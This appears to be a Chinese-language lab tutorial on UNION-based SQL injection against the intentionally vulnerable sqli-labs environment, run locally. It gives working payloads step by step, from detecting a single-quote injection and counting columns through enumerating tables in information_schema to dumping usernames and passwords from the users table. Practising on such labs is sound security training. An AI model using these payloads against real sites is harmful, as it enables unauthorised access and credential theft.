mysql注入联合查询

环境搭建

下载复现漏洞的包

下载小皮面板

将下载好的文件解压在小皮面板的phpstudy_pro\WWW路径下

将这个文件phpstudy_pro\WWW\sqli-labs-php7-master\sql-connections\db-creds.inc

中的密码更改为小皮面板中的密码

选择php版本

在小皮中启动nginx和数据库

使用环回地址访问

先判断是什么类型的注入

使用id=2-1和id=1,如果两者结果相同则为字符型否则为数字类

id=1后面加'或"查看报错

使用后发现返回值为mysql的报错

使用id=' --+

发现结果和id=1一致说明我们第一次使用 ' 时使mysql语句中多了个 ' 第二次使用--+说明输入的单引号与前面的id=1形成了一个闭合,因此可以判断注入类型为字符型,闭合方式为单引号

我们要对字段数进行判断

id=1' order by 1 --+ 可以使用二分大法

找到准确的列数后可以用union进行查询了,比如列数是3

id=1' union select 1,2,3 limit 1,1 --+ 或者

id=-1' union select 1,2,3 --+
联合查询的输出是严格按照顺序进行的,因此当id=1存在时会在第0行输出第一个sql语句查询到的结果,输入的数字就到了下一行 而 limit 1,2的作用为从第num1行开始显示num2行内容

我们可以看到2,3被输出了,说明这两个位置都可以作为回显点

也可以不用limit语句,只需让前面sql语句查询结果为空

然后就可以开始爆库名了

id=-1' union select 1,database(),3 --+

database()显示当前库名称 也可以使用group_concat() 将所有内容写入一行并输出

爆表名

id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

查找数据库中security库下的所有表名

payload:information_schema是mysql自带的库,记录了该数据库所有的表名和字段名

显然users十分关键

看字段名

id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

查询数据库security下表users中的所有字段

同理username与password看起来非常重要

进去看看

id=-1' union select 1,group_concat(username,0x3a,password),3 from security.users --+

查询security库中users表中字段username与password的所有信息

0x3a为16进制 意思是 ' :'

相关推荐
桀桀桀桀桀桀23 分钟前
数据库中的用户管理和权限管理
数据库·mysql
superman超哥1 小时前
04 深入 Oracle 并发世界:MVCC、锁、闩锁、事务隔离与并发性能优化的探索
数据库·oracle·性能优化·dba
用户8007165452001 小时前
HTAP数据库国产化改造技术可行性方案分析
数据库
engchina2 小时前
Neo4j 和 Python 初学者指南:如何使用可选关系匹配优化 Cypher 查询
数据库·python·neo4j
engchina2 小时前
使用 Cypher 查询语言在 Neo4j 中查找最短路径
数据库·neo4j
尘浮生2 小时前
Java项目实战II基于Spring Boot的光影视频平台(开发文档+数据库+源码)
java·开发语言·数据库·spring boot·后端·maven·intellij-idea
威哥爱编程2 小时前
SQL Server 数据太多如何优化
数据库·sql·sqlserver
小华同学ai2 小时前
AJ-Report:一款开源且非常强大的数据可视化大屏和报表工具
数据库·信息可视化·开源
Acrelhuang3 小时前
安科瑞5G基站直流叠光监控系统-安科瑞黄安南
大数据·数据库·数据仓库·物联网
十叶知秋4 小时前
【jmeter】jmeter的线程组功能的详细介绍
数据库·jmeter·性能测试